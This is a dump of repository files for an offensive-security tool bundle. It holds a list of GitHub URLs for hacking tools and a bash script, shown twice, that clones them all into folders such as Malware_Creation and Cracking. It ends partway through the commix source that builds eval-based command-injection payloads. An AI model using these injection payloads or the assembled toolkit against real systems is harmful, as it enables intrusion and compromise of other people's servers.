96 | https://github.com/JoeDog/siege 97 | https://github.com/JohnTroony/php-webshells 98 | https://github.com/JPaulMora/Pyrit 99 | https://github.com/jsvine/waybackpack 100 | https://github.com/juansacco/exploitpack 101 | https://github.com/Jumpst3r/AsciiToDucky 102 | https://github.com/k4m4/onioff 103 | https://github.com/kevthehermit/dc-toolkit 104 | https://github.com/kevthehermit/RATDecoders 105 | https://github.com/knownsec/Pocsuite 106 | https://github.com/korczis/foremost 107 | https://github.com/kurobeats/fimap 108 | https://github.com/lanjelot/patator 109 | https://github.com/leebaird/discover 110 | https://github.com/lhr0909/PythonObfuscator 111 | https://github.com/liftoff/pyminifier 112 | https://github.com/lightbulb-framework/lightbulb-framework 113 | https://github.com/luisgg/ophcrack 114 | https://github.com/m0nad/HellRaiser/ 115 | https://github.com/m3pt0r/l0l 116 | https://github.com/magnumripper/JohnTheRipper 117 | https://github.com/marshyski/sshwatch 118 | https://github.com/merculite/BLE-Security 119 | https://github.com/micahflee/onionshare 120 | https://github.com/mikeryan/crackle 121 | https://github.com/misterch0c/malSploitBase 122 | https://github.com/mitmproxy/mitmproxy 123 | https://github.com/mthbernardes/EvilTool 124 | https://github.com/nbs-system/naxsi 125 | https://github.com/nmap/nmap 126 | https://github.com/NORMA-Inc/AtEar 127 | https://github.com/OsandaMalith/LFiFreak/ 128 | https://github.com/P0cL4bs/Kadimus 129 | https://github.com/ParrotSec/car-hacking-tools 130 | https://github.com/PenturaLabs/Linux_Exploit_Suggester 131 | https://github.com/praetorian-inc/Hob0Rules 132 | https://github.com/psypanda/hashID 133 | https://github.com/r00t-3xp10it/morpheus 134 | https://github.com/radare/radare2 135 | https://github.com/rafael-santiago/pig 136 | https://github.com/ReclaimYourPrivacy/eschalot 137 | https://github.com/reverse-shell/routersploit 138 | https://github.com/reyammer/shellnoob 139 | https://github.com/rezasp/joomscan 140 | https://github.com/rezasp/vbscan 141 | https://github.com/rfunix/Pompem 142 | https://github.com/rsmudge/armitage 143 | https://github.com/s3inlc/holm 144 | https://github.com/SafeStack/ava 145 | https://github.com/SageHack/cloud-buster 146 | https://github.com/SageHack/cloudflare-resolver 147 | https://github.com/samratashok/Kautilya 148 | https://github.com/samratashok/nishang 149 | https://github.com/savio-code/ghost-phisher 150 | https://github.com/Screetsec/Brutal 151 | https://github.com/Screetsec/Dracnmap 152 | https://github.com/Screetsec/TheFatRat 153 | https://github.com/SECFORCE/sparta 154 | https://github.com/secretsquirrel/the-backdoor-factory/ 155 | https://github.com/securestate/termineter 156 | https://github.com/seifreed/dirb 157 | https://github.com/sensepost/DET 158 | https://github.com/sensepost/kwetza 159 | https://github.com/sensepost/xrdp 160 | https://github.com/shawarkhanethicalhacker/D-TECT 161 | https://github.com/simsong/tcpflow 162 | https://github.com/sleuthkit/autopsy 163 | https://github.com/sleuthkit/sleuthkit 164 | https://github.com/sophron/wifiphisher 165 | https://github.com/SpiderLabs/jboss-autopwn 166 | https://github.com/suraj-root/spade 167 | https://github.com/tcstool/fireaway 168 | https://github.com/tcstool/NoSQLMap 169 | https://github.com/TheRook/subbrute 170 | https://github.com/thesp0nge/dawnscanner 171 | https://github.com/timwr/CVE-2016-5195 172 | https://github.com/tnich/honssh 173 | https://github.com/tomac/yersinia 174 | https://github.com/trustedsec/ptf 175 | https://github.com/TryCatchHCF/Cloakify 176 | https://github.com/ufrisk/pcileech 177 | https://github.com/urbanadventurer/WhatWeb 178 | https://github.com/USArmyResearchLab/Dshell 179 | https://github.com/v3n0m-Scanner/V3n0M-Scanner 180 | https://github.com/vk496/linset 181 | https://github.com/volatilityfoundation/volatility 182 | https://github.com/vusec/drammer 183 | https://github.com/vvalien/SharpMeter 184 | https://github.com/WhiteMatt3r/Skype-Tool 185 | https://github.com/wi-fi-analyzer/mdk3-master 186 | https://github.com/wick2o/gitdigger 187 | https://github.com/wiire/pixiewps 188 | https://github.com/wireghoul/dotdotpwn 189 | https://github.com/wpscanteam/wpscan 190 | https://github.com/x3omdax/PenBox 191 | https://github.com/yaph/domxssscanner 192 | https://github.com/ysrc/F-Scrack 193 | https://github.com/zennro/fbht-linux 194 | https://github.com/zeroq/amun 195 | https://github.com/zscproject/OWASP-ZSC 196 | https://www.kismetwireless.net/kismet.git 197 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/Download_Script.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Installer script. 3 | 4 | #Yes/No prompt. 5 | read -p "This script will install all of the tools included in list.txt - Do you wanna install them to your current directory? [Y/n] " -n 1 -r 6 | echo 7 | if [[ ! $REPLY =~ ^[Yy]$ ]] 8 | then 9 | [[ "$0" = "$BASH_SOURCE" ]] && exit 1 || return 1 # handle exits from shell or function but doesn't exit the interactive shell. 10 | fi 11 | 12 | #Checks for git. 13 | command -v git >/dev/null 2>&1 || { echo >&2 "You don't have git. Run 'apt-get install git' first."; exit 1; } 14 | 15 | #Clones tools from pack. 16 | for i in `cat list.txt`; do git clone --quiet "$i" && echo "$i downloaded successfully."; done 17 | 18 | #Tells the user what the script is doing. 19 | echo "Creating Catagorized folders..." 20 | 21 | #Makes directories. 22 | mkdir "Forensics" 23 | mkdir "General_Exploitation" 24 | mkdir "Hardware_Related" 25 | mkdir "Cracking" 26 | mkdir "Malware_Creation" 27 | mkdir "MitM" 28 | mkdir "Other" 29 | mkdir "Reverse_Engineering" 30 | mkdir "Stress_Testing" 31 | mkdir "Web_Server_Exploitation" 32 | mkdir "Wireless_Exploitation" 33 | 34 | #Tells the user what the script is doing. 35 | echo "Moving tools into said folders..." 36 | 37 | #Moves the tools to the correct folders. 38 | mv "ace-voip/" "MitM/" 39 | mv "AFE/" "Hardware_Related/" 40 | mv "aircrack-ng/" "Wireless_Exploitation/" 41 | mv "amap/" "Other/" 42 | mv "amun/" "MitM/" 43 | mv "arachni/" "Web_Server_Exploitation/" 44 | mv "armitage/" "General_Exploitation/" 45 | mv "Arsenal_X/" "Other/" 46 | mv "AsciiToDucky/" "Hardware_Related/" 47 | mv "AtEar/" "Wireless_Exploitation/" 48 | mv "atom-bombing/" "Malware_Creation/" 49 | mv "ATSCAN/" "Web_Server_Exploitation/" 50 | mv "autopsy/" "Forensics/" 51 | mv "ava/" "General_Exploitation/" 52 | mv "bashobfus/" "Other/" 53 | mv "beef/" "General_Exploitation/" 54 | mv "bettercap/" "MitM/" 55 | mv "binarypig/" "Reverse_Engineering/" 56 | mv "BinGoo/" "Web_Server_Exploitation/" 57 | mv "binwalk/" "Reverse_Engineering/" 58 | mv "BLE-Security/" "Hardware_Related/" 59 | mv "bohatei/" "Stress_Testing/" 60 | mv "brut3k1t/" "Cracking/" 61 | mv "Brutal/" "Hardware_Related/" 62 | mv "BypassCF/" "Web_Server_Exploitation/" 63 | mv "car-hacking-tools/" "Hardware_Related/" 64 | mv "CeWL/" "Cracking/" 65 | mv "chrome-decrypter/" "Cracking/" 66 | mv "chromebackdoor/" "Malware_Creation/" 67 | mv "cisco-auditing-tool/" "Hardware_Related/" 68 | mv "cisco-global-exploiter/" "Hardware_Related/" 69 | mv "cisco-ocs/" "Hardware_Related/" 70 | mv "cisco-torch/" "Hardware_Related/" 71 | mv "Cloakify/" "Malware_Creation/" 72 | mv "cloud-buster/" "Web_Server_Exploitation/" 73 | mv "cloudflare-resolver/" "Web_Server_Exploitation/" 74 | mv "clusterd/" "General_Exploitation/" 75 | mv "CMSmap/" "Web_Server_Exploitation/" 76 | mv "commix/" "Web_Server_Exploitation/" 77 | mv "crackle/" "Wireless_Exploitation/" 78 | mv "CVE-2016-5195/" "Hardware_Related/" 79 | mv "D-TECT/" "General_Exploitation/" 80 | mv "dawnscanner/" "Web_Server_Exploitation/" 81 | mv "dc-toolkit/" "Reverse_Engineering/" 82 | mv "dedsploit/" "General_Exploitation/" 83 | mv "DET/" "Other/" 84 | mv "dirb/" "Web_Server_Exploitation/" 85 | mv "discover/" "General_Exploitation/" 86 | mv "dnSpy/" "Reverse_Engineering/" 87 | mv "dnsrecon/" "Web_Server_Exploitation/" 88 | mv "domxssscanner/" "Web_Server_Exploitation/" 89 | mv "doork/" "Web_Server_Exploitation/" 90 | mv "dotdotpwn/" "Web_Server_Exploitation/" 91 | mv "Dracnmap/" "General_Exploitation/" 92 | mv "drammer/" "Hardware_Related/" 93 | mv "dripcap/" "MitM/" 94 | mv "droid-hunter/" "Hardware_Related/" 95 | mv "Dshell/" "Forensics/" 96 | mv "Empire/" "Malware_Creation/" 97 | mv "eschalot/" "Other/" 98 | mv "ettercap/" "MitM/" 99 | mv "evilgrade/" "MitM/" 100 | mv "EvilTool/" "Web_Server_Exploitation/" 101 | mv "exploitpack/" "General_Exploitation/" 102 | mv "extract-hashes/" "Cracking/" 103 | mv "F-Scrack/" "General_Exploitation/" 104 | mv "fbht-linux/" "Other/" 105 | mv "fbht/" "Other/" 106 | mv "fimap/" "Web_Server_Exploitation/" 107 | mv "findmyhash/" "Cracking/" 108 | mv "Findsploit/" "Other/" 109 | mv "FIR/" "Other/" 110 | mv "fireaway/" "General_Exploitation/" 111 | mv "foremost/" "Forensics/" 112 | mv "ghost-phisher/" "MitM/" 113 | mv "gitdigger/" "Cracking/" 114 | mv "grr/" "Forensics/" 115 | mv "hakkuframework/" "General_Exploitation/" 116 | mv "HasciiCam/" "Other/" 117 | mv "hashcat/" "Cracking/" 118 | mv "hashID/" "Cracking/" 119 | mv "HellRaiser/" "Web_Server_Exploitation/" 120 | mv "Hob0Rules/" "Cracking/" 121 | mv "holm/" "Cracking/" 122 | mv "HoneyPy/" "MitM/" 123 | mv "honssh/" "MitM/" 124 | mv "intelmq/" "Other/" 125 | mv "jboss-autopwn/" "General_Exploitation/" 126 | mv "JohnTheRipper/" "Cracking/" 127 | mv "joomscan/" "Web_Server_Exploitation/" 128 | mv "Kadabra/" "Web_Server_Exploitation/" 129 | mv "Kadimus/" "Web_Server_Exploitation/" 130 | mv "Kautilya/" "General_Exploitation/" 131 | mv "kippo/" "MitM/" 132 | mv "kismet/" "Wireless_Exploitation/" 133 | mv "kwetza/" "Malware_Creation/" 134 | mv "l0l/" "General_Exploitation/" 135 | mv "LFiFreak/" "Web_Server_Exploitation/" 136 | mv "LHF/" "General_Exploitation/" 137 | mv "libenom/" "Malware_Creation/" 138 | mv "liffy/" "Web_Server_Exploitation/" 139 | mv "lightbulb-framework/" "Web_Server_Exploitation/" 140 | mv "linset/" "Wireless_Exploitation/" 141 | mv "Linux_Exploit_Suggester/" "Other/" 142 | mv "malSploitBase/" "Reverse_Engineering/" 143 | mv "mdk3-master/" "Wireless_Exploitation/" 144 | mv "metasploit-framework/" "General_Exploitation/" 145 | mv "mimikatz/" "General_Exploitation/" 146 | mv "mitmproxy/" "MitM/" 147 | mv "Mobile-Security-Framework-MobSF/" "Hardware_Related/" 148 | mv "moloch/" "MitM/" 149 | mv "morpheus/" "MitM/" 150 | mv "mpc/" "Malware_Creation/" 151 | mv "naxsi/" "Other/" 152 | mv "nipe/" "Other/" 153 | mv "nishang/" "Malware_Creation/" 154 | mv "nmap/" "General_Exploitation/" 155 | mv "no-more-secrets/" "Other/" 156 | mv "NoSQLMap/" "Web_Server_Exploitation/" 157 | mv "onioff/" "Other/" 158 | mv "onionshare/" "Other/" 159 | mv "ophcrack/" "Cracking/" 160 | mv "OWASP-ZSC/" "Malware_Creation/" 161 | mv "passivedns/" "MitM/" 162 | mv "Pastebin-Scraper/" "Other/" 163 | mv "patator/" "General_Exploitation/" 164 | mv "pcileech/" "Hardware_Related/" 165 | mv "PenBox/" "General_Exploitation/" 166 | mv "php-webshells/" "Web_Server_Exploitation/" 167 | mv "pig/" "Other/" 168 | mv "pixiewps/" "Wireless_Exploitation/" 169 | mv "Pocsuite/" "Web_Server_Exploitation/" 170 | mv "Pompem/" "Other/" 171 | mv "ptf/" "General_Exploitation/" 172 | mv "pth-toolkit/" "Cracking/" 173 | mv "pwndsh/" "General_Exploitation/" 174 | mv "pwntools/" "Other/" 175 | mv "pybomber/" "Other/" 176 | mv "pyDirBuster/" "Web_Server_Exploitation/" 177 | mv "pyfiscan/" "Web_Server_Exploitation/" 178 | mv "pyminifier/" "Other/" 179 | mv "Pyrit/" "Wireless_Exploitation/" 180 | mv "python-pentest-tools/" "General_Exploitation/" 181 | mv "PythonObfuscator/" "Other/" 182 | mv "radare2/" "Reverse_Engineering/" 183 | mv "rainbowcrack/" "Cracking/" 184 | mv "RATDecoders/" "Reverse_Engineering/" 185 | mv "reaver-wps/" "Wireless_Exploitation/" 186 | mv "recon-ng/" "Other/" 187 | mv "rext/" "Hardware_Related" 188 | mv "Routerhunter-2.0/" "Hardware_Related/" 189 | mv "routersploit/" "Hardware_Related/" 190 | mv "rowhammer-test/" "Other/" 191 | mv "SCANNER-INURLBR/" "Web_Server_Exploitation/" 192 | mv "scansploit/" "Other/" 193 | mv "SecLists/" "Other/" 194 | mv "SharpMeter/" "Malware_Creation/" 195 | mv "shellnoob/" "Malware_Creation/" 196 | mv "shellshock-hunter-google/" "Web_Server_Exploitation/" 197 | mv "shellshock-hunter/" "Web_Server_Exploitation/" 198 | mv "shellsploit-framework/" "Malware_Creation/" 199 | mv "siege/" "Stress_Testing/" 200 | mv "Skype-Tool/" "Other/" 201 | mv "SkypeMass/" "Other/" 202 | mv "sleuthkit/" "Forensics/" 203 | mv "Smartphone-Pentest-Framework/" "Hardware_Related/" 204 | mv "Sn1per/" "Web_Server_Exploitation/" 205 | mv "social-engineer-toolkit/" "General_Exploitation/" 206 | mv "spade/" "Malware_Creation/" 207 | mv "sparta/" "General_Exploitation/" 208 | mv "spiderfoot/" "Web_Server_Exploitation/" 209 | mv "sploitego/" "Other/" 210 | mv "sqlchop/" "Other/" 211 | mv "sqlmap/" "Web_Server_Exploitation/" 212 | mv "sshwatch/" "MitM/" 213 | mv "stenographer/" "MitM/" 214 | mv "subbrute/" "Web_Server_Exploitation/" 215 | mv "tcpflow/" "MitM/" 216 | mv "TekDefense-Automater/" "Web_Server_Exploitation/" 217 | mv "termineter/" "Hardware_Related/" 218 | mv "the-backdoor-factory/" "Malware_Creation/" 219 | mv "The-Eye/" "Other/" 220 | mv "TheFatRat/" "Malware_Creation/" 221 | mv "torshammer/" "Stress_Testing/" 222 | mv "V3n0M-Scanner/" "Web_Server_Exploitation/" 223 | mv "vbscan/" "Web_Server_Exploitation/" 224 | mv "Veil-Evasion/" "Malware_Creation/" 225 | mv "volatility/" "Forensics/" 226 | mv "w3af/" "Web_Server_Exploitation/" 227 | mv "wafw00f/" "Web_Server_Exploitation/" 228 | mv "waybackpack/" "Other/" 229 | mv "weeman/" "Web_Server_Exploitation/" 230 | mv "weevely3/" "Web_Server_Exploitation/" 231 | mv "WhatWeb/" "Web_Server_Exploitation/" 232 | mv "wifijammer/" "Wireless_Exploitation/" 233 | mv "wifiphisher/" "Wireless_Exploitation/" 234 | mv "wifite/" "Wireless_Exploitation/" 235 | mv "Windows-Exploit-Suggester/" "Other/" 236 | mv "wpscan/" "Web_Server_Exploitation/" 237 | mv "xortool/" "Reverse_Engineering/" 238 | mv "xrdp/" "General_Exploitation/" 239 | mv "yersinia/" "Stress_Testing/" 240 | mv "zarp/" "General_Exploitation/" 241 | 242 | 243 | echo "Finished!" 244 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/download-tools-hacking/Download_Script.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Installer script. 3 | 4 | #Yes/No prompt. 5 | read -p "This script will install all of the tools included in list.txt - Do you wanna install them to your current directory? [Y/n] " -n 1 -r 6 | echo 7 | if [[ ! $REPLY =~ ^[Yy]$ ]] 8 | then 9 | [[ "$0" = "$BASH_SOURCE" ]] && exit 1 || return 1 # handle exits from shell or function but doesn't exit the interactive shell. 10 | fi 11 | 12 | #Checks for git. 13 | command -v git >/dev/null 2>&1 || { echo >&2 "You don't have git. Run 'apt-get install git' first."; exit 1; } 14 | 15 | #Clones tools from pack. 16 | for i in `cat list.txt`; do git clone --quiet "$i" && echo "$i downloaded successfully."; done 17 | 18 | #Tells the user what the script is doing. 19 | echo "Creating Catagorized folders..." 20 | 21 | #Makes directories. 22 | mkdir "Forensics" 23 | mkdir "General_Exploitation" 24 | mkdir "Hardware_Related" 25 | mkdir "Cracking" 26 | mkdir "Malware_Creation" 27 | mkdir "MitM" 28 | mkdir "Other" 29 | mkdir "Reverse_Engineering" 30 | mkdir "Stress_Testing" 31 | mkdir "Web_Server_Exploitation" 32 | mkdir "Wireless_Exploitation" 33 | 34 | #Tells the user what the script is doing. 35 | echo "Moving tools into said folders..." 36 | 37 | #Moves the tools to the correct folders. 38 | mv "ace-voip/" "MitM/" 39 | mv "AFE/" "Hardware_Related/" 40 | mv "aircrack-ng/" "Wireless_Exploitation/" 41 | mv "amap/" "Other/" 42 | mv "amun/" "MitM/" 43 | mv "arachni/" "Web_Server_Exploitation/" 44 | mv "armitage/" "General_Exploitation/" 45 | mv "Arsenal_X/" "Other/" 46 | mv "AsciiToDucky/" "Hardware_Related/" 47 | mv "AtEar/" "Wireless_Exploitation/" 48 | mv "atom-bombing/" "Malware_Creation/" 49 | mv "ATSCAN/" "Web_Server_Exploitation/" 50 | mv "autopsy/" "Forensics/" 51 | mv "ava/" "General_Exploitation/" 52 | mv "bashobfus/" "Other/" 53 | mv "beef/" "General_Exploitation/" 54 | mv "bettercap/" "MitM/" 55 | mv "binarypig/" "Reverse_Engineering/" 56 | mv "BinGoo/" "Web_Server_Exploitation/" 57 | mv "binwalk/" "Reverse_Engineering/" 58 | mv "BLE-Security/" "Hardware_Related/" 59 | mv "bohatei/" "Stress_Testing/" 60 | mv "brut3k1t/" "Cracking/" 61 | mv "Brutal/" "Hardware_Related/" 62 | mv "BypassCF/" "Web_Server_Exploitation/" 63 | mv "car-hacking-tools/" "Hardware_Related/" 64 | mv "CeWL/" "Cracking/" 65 | mv "chrome-decrypter/" "Cracking/" 66 | mv "chromebackdoor/" "Malware_Creation/" 67 | mv "cisco-auditing-tool/" "Hardware_Related/" 68 | mv "cisco-global-exploiter/" "Hardware_Related/" 69 | mv "cisco-ocs/" "Hardware_Related/" 70 | mv "cisco-torch/" "Hardware_Related/" 71 | mv "Cloakify/" "Malware_Creation/" 72 | mv "cloud-buster/" "Web_Server_Exploitation/" 73 | mv "cloudflare-resolver/" "Web_Server_Exploitation/" 74 | mv "clusterd/" "General_Exploitation/" 75 | mv "CMSmap/" "Web_Server_Exploitation/" 76 | mv "commix/" "Web_Server_Exploitation/" 77 | mv "crackle/" "Wireless_Exploitation/" 78 | mv "CVE-2016-5195/" "Hardware_Related/" 79 | mv "D-TECT/" "General_Exploitation/" 80 | mv "dawnscanner/" "Web_Server_Exploitation/" 81 | mv "dc-toolkit/" "Reverse_Engineering/" 82 | mv "dedsploit/" "General_Exploitation/" 83 | mv "DET/" "Other/" 84 | mv "dirb/" "Web_Server_Exploitation/" 85 | mv "discover/" "General_Exploitation/" 86 | mv "dnSpy/" "Reverse_Engineering/" 87 | mv "dnsrecon/" "Web_Server_Exploitation/" 88 | mv "domxssscanner/" "Web_Server_Exploitation/" 89 | mv "doork/" "Web_Server_Exploitation/" 90 | mv "dotdotpwn/" "Web_Server_Exploitation/" 91 | mv "Dracnmap/" "General_Exploitation/" 92 | mv "drammer/" "Hardware_Related/" 93 | mv "dripcap/" "MitM/" 94 | mv "droid-hunter/" "Hardware_Related/" 95 | mv "Dshell/" "Forensics/" 96 | mv "Empire/" "Malware_Creation/" 97 | mv "eschalot/" "Other/" 98 | mv "ettercap/" "MitM/" 99 | mv "evilgrade/" "MitM/" 100 | mv "EvilTool/" "Web_Server_Exploitation/" 101 | mv "exploitpack/" "General_Exploitation/" 102 | mv "extract-hashes/" "Cracking/" 103 | mv "F-Scrack/" "General_Exploitation/" 104 | mv "fbht-linux/" "Other/" 105 | mv "fbht/" "Other/" 106 | mv "fimap/" "Web_Server_Exploitation/" 107 | mv "findmyhash/" "Cracking/" 108 | mv "Findsploit/" "Other/" 109 | mv "FIR/" "Other/" 110 | mv "fireaway/" "General_Exploitation/" 111 | mv "foremost/" "Forensics/" 112 | mv "ghost-phisher/" "MitM/" 113 | mv "gitdigger/" "Cracking/" 114 | mv "grr/" "Forensics/" 115 | mv "hakkuframework/" "General_Exploitation/" 116 | mv "HasciiCam/" "Other/" 117 | mv "hashcat/" "Cracking/" 118 | mv "hashID/" "Cracking/" 119 | mv "HellRaiser/" "Web_Server_Exploitation/" 120 | mv "Hob0Rules/" "Cracking/" 121 | mv "holm/" "Cracking/" 122 | mv "HoneyPy/" "MitM/" 123 | mv "honssh/" "MitM/" 124 | mv "intelmq/" "Other/" 125 | mv "jboss-autopwn/" "General_Exploitation/" 126 | mv "JohnTheRipper/" "Cracking/" 127 | mv "joomscan/" "Web_Server_Exploitation/" 128 | mv "Kadabra/" "Web_Server_Exploitation/" 129 | mv "Kadimus/" "Web_Server_Exploitation/" 130 | mv "Kautilya/" "General_Exploitation/" 131 | mv "kippo/" "MitM/" 132 | mv "kismet/" "Wireless_Exploitation/" 133 | mv "kwetza/" "Malware_Creation/" 134 | mv "l0l/" "General_Exploitation/" 135 | mv "LFiFreak/" "Web_Server_Exploitation/" 136 | mv "LHF/" "General_Exploitation/" 137 | mv "libenom/" "Malware_Creation/" 138 | mv "liffy/" "Web_Server_Exploitation/" 139 | mv "lightbulb-framework/" "Web_Server_Exploitation/" 140 | mv "linset/" "Wireless_Exploitation/" 141 | mv "Linux_Exploit_Suggester/" "Other/" 142 | mv "malSploitBase/" "Reverse_Engineering/" 143 | mv "mdk3-master/" "Wireless_Exploitation/" 144 | mv "metasploit-framework/" "General_Exploitation/" 145 | mv "mimikatz/" "General_Exploitation/" 146 | mv "mitmproxy/" "MitM/" 147 | mv "Mobile-Security-Framework-MobSF/" "Hardware_Related/" 148 | mv "moloch/" "MitM/" 149 | mv "morpheus/" "MitM/" 150 | mv "mpc/" "Malware_Creation/" 151 | mv "naxsi/" "Other/" 152 | mv "nipe/" "Other/" 153 | mv "nishang/" "Malware_Creation/" 154 | mv "nmap/" "General_Exploitation/" 155 | mv "no-more-secrets/" "Other/" 156 | mv "NoSQLMap/" "Web_Server_Exploitation/" 157 | mv "onioff/" "Other/" 158 | mv "onionshare/" "Other/" 159 | mv "ophcrack/" "Cracking/" 160 | mv "OWASP-ZSC/" "Malware_Creation/" 161 | mv "passivedns/" "MitM/" 162 | mv "Pastebin-Scraper/" "Other/" 163 | mv "patator/" "General_Exploitation/" 164 | mv "pcileech/" "Hardware_Related/" 165 | mv "PenBox/" "General_Exploitation/" 166 | mv "php-webshells/" "Web_Server_Exploitation/" 167 | mv "pig/" "Other/" 168 | mv "pixiewps/" "Wireless_Exploitation/" 169 | mv "Pocsuite/" "Web_Server_Exploitation/" 170 | mv "Pompem/" "Other/" 171 | mv "ptf/" "General_Exploitation/" 172 | mv "pth-toolkit/" "Cracking/" 173 | mv "pwndsh/" "General_Exploitation/" 174 | mv "pwntools/" "Other/" 175 | mv "pybomber/" "Other/" 176 | mv "pyDirBuster/" "Web_Server_Exploitation/" 177 | mv "pyfiscan/" "Web_Server_Exploitation/" 178 | mv "pyminifier/" "Other/" 179 | mv "Pyrit/" "Wireless_Exploitation/" 180 | mv "python-pentest-tools/" "General_Exploitation/" 181 | mv "PythonObfuscator/" "Other/" 182 | mv "radare2/" "Reverse_Engineering/" 183 | mv "rainbowcrack/" "Cracking/" 184 | mv "RATDecoders/" "Reverse_Engineering/" 185 | mv "reaver-wps/" "Wireless_Exploitation/" 186 | mv "recon-ng/" "Other/" 187 | mv "rext/" "Hardware_Related" 188 | mv "Routerhunter-2.0/" "Hardware_Related/" 189 | mv "routersploit/" "Hardware_Related/" 190 | mv "rowhammer-test/" "Other/" 191 | mv "SCANNER-INURLBR/" "Web_Server_Exploitation/" 192 | mv "scansploit/" "Other/" 193 | mv "SecLists/" "Other/" 194 | mv "SharpMeter/" "Malware_Creation/" 195 | mv "shellnoob/" "Malware_Creation/" 196 | mv "shellshock-hunter-google/" "Web_Server_Exploitation/" 197 | mv "shellshock-hunter/" "Web_Server_Exploitation/" 198 | mv "shellsploit-framework/" "Malware_Creation/" 199 | mv "siege/" "Stress_Testing/" 200 | mv "Skype-Tool/" "Other/" 201 | mv "SkypeMass/" "Other/" 202 | mv "sleuthkit/" "Forensics/" 203 | mv "Smartphone-Pentest-Framework/" "Hardware_Related/" 204 | mv "Sn1per/" "Web_Server_Exploitation/" 205 | mv "social-engineer-toolkit/" "General_Exploitation/" 206 | mv "spade/" "Malware_Creation/" 207 | mv "sparta/" "General_Exploitation/" 208 | mv "spiderfoot/" "Web_Server_Exploitation/" 209 | mv "sploitego/" "Other/" 210 | mv "sqlchop/" "Other/" 211 | mv "sqlmap/" "Web_Server_Exploitation/" 212 | mv "sshwatch/" "MitM/" 213 | mv "stenographer/" "MitM/" 214 | mv "subbrute/" "Web_Server_Exploitation/" 215 | mv "tcpflow/" "MitM/" 216 | mv "TekDefense-Automater/" "Web_Server_Exploitation/" 217 | mv "termineter/" "Hardware_Related/" 218 | mv "the-backdoor-factory/" "Malware_Creation/" 219 | mv "The-Eye/" "Other/" 220 | mv "TheFatRat/" "Malware_Creation/" 221 | mv "torshammer/" "Stress_Testing/" 222 | mv "V3n0M-Scanner/" "Web_Server_Exploitation/" 223 | mv "vbscan/" "Web_Server_Exploitation/" 224 | mv "Veil-Evasion/" "Malware_Creation/" 225 | mv "volatility/" "Forensics/" 226 | mv "w3af/" "Web_Server_Exploitation/" 227 | mv "wafw00f/" "Web_Server_Exploitation/" 228 | mv "waybackpack/" "Other/" 229 | mv "weeman/" "Web_Server_Exploitation/" 230 | mv "weevely3/" "Web_Server_Exploitation/" 231 | mv "WhatWeb/" "Web_Server_Exploitation/" 232 | mv "wifijammer/" "Wireless_Exploitation/" 233 | mv "wifiphisher/" "Wireless_Exploitation/" 234 | mv "wifite/" "Wireless_Exploitation/" 235 | mv "Windows-Exploit-Suggester/" "Other/" 236 | mv "wpscan/" "Web_Server_Exploitation/" 237 | mv "xortool/" "Reverse_Engineering/" 238 | mv "xrdp/" "General_Exploitation/" 239 | mv "yersinia/" "Stress_Testing/" 240 | mv "zarp/" "General_Exploitation/" 241 | 242 | 243 | echo "Finished!" 244 | -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/eval_based/eb_payloads.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | The dynamic code evaluation (aka eval-based) technique. 20 | The available "eval-based" payloads. 21 | """ 22 | 23 | """ 24 | eval-based decision payload (check if host is vulnerable). 25 | """ 26 | def decision(separator, TAG, randv1, randv2): 27 | if settings.TARGET_OS == "win": 28 | if settings.SKIP_CALC: 29 | if separator == "": 30 | payload = ("print(`echo " + TAG + "`." + 31 | "`echo " + TAG + "`." + 32 | "`echo " + TAG + "`)" + 33 | separator 34 | ) 35 | else: 36 | payload = ("print(`echo " + TAG + 37 | separator + "echo " + TAG + 38 | separator + "echo " + TAG + "`)%3B" 39 | ) 40 | else: 41 | if separator == "": 42 | payload = ("print(`echo " + TAG + "`." + 43 | "`for /f \"tokens=*\" %i in ('cmd /c \"" + 44 | "set /a (" + str(randv1) + "%2B" + str(randv2) + ")" + 45 | "\"') do @set /p =%i < nul`." + 46 | "`echo " + TAG + "`." + 47 | "`echo " + TAG + "`)" + 48 | separator 49 | ) 50 | else: 51 | payload = ("print(`echo " + TAG + 52 | separator + "for /f \"tokens=*\" %i in ('cmd /c \"" + 53 | "set /a (" + str(randv1) + "%2B" + str(randv2) + ")" + 54 | "\"') do @set /p =%i < nul" + 55 | separator + "echo " + TAG + 56 | separator + "echo " + TAG + "`)%3B" 57 | ) 58 | 59 | else: 60 | if settings.SKIP_CALC: 61 | if separator == "": 62 | payload = ("print(`echo " + TAG + "`." + 63 | "`echo " + TAG + "`." + 64 | "`echo " + TAG + "`)" + 65 | separator 66 | ) 67 | else: 68 | payload = ("print(`echo " + TAG + 69 | separator + "echo " + TAG + 70 | separator + "echo " + TAG + "`)%3B" 71 | ) 72 | else: 73 | if separator == "": 74 | payload = ("print(`echo " + TAG + "`." + 75 | "`echo $((" + str(randv1) + "%2B" + str(randv2) + "))`." + 76 | "`echo " + TAG + "`." + 77 | "`echo " + TAG + "`)" + 78 | separator 79 | ) 80 | else: 81 | payload = ("print(`echo " + TAG + 82 | separator + "echo $((" + str(randv1) + "%2B" + str(randv2) + "))" + 83 | separator + "echo " + TAG + 84 | separator + "echo " + TAG + "`)%3B" 85 | ) 86 | 87 | return payload 88 | 89 | """ 90 | __Warning__: The alternative shells are still experimental. 91 | """ 92 | def decision_alter_shell(separator, TAG, randv1, randv2): 93 | if settings.TARGET_OS == "win": 94 | python_payload = settings.WIN_PYTHON_DIR + " -c \"print str(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))\"" 95 | if settings.SKIP_CALC: 96 | if separator == "": 97 | payload = ("print(`echo " + TAG + "`." + 98 | "`echo " + TAG + "`." + 99 | "`echo " + TAG + "`)" + 100 | separator 101 | ) 102 | else: 103 | payload = ("print(`echo " + TAG + 104 | separator + "echo " + TAG + 105 | separator + "echo " + TAG + "`)%3B" 106 | ) 107 | else: 108 | if separator == "": 109 | payload = ("print(`echo " + TAG + "`." + 110 | "` cmd /c " + python_payload + "`." + 111 | 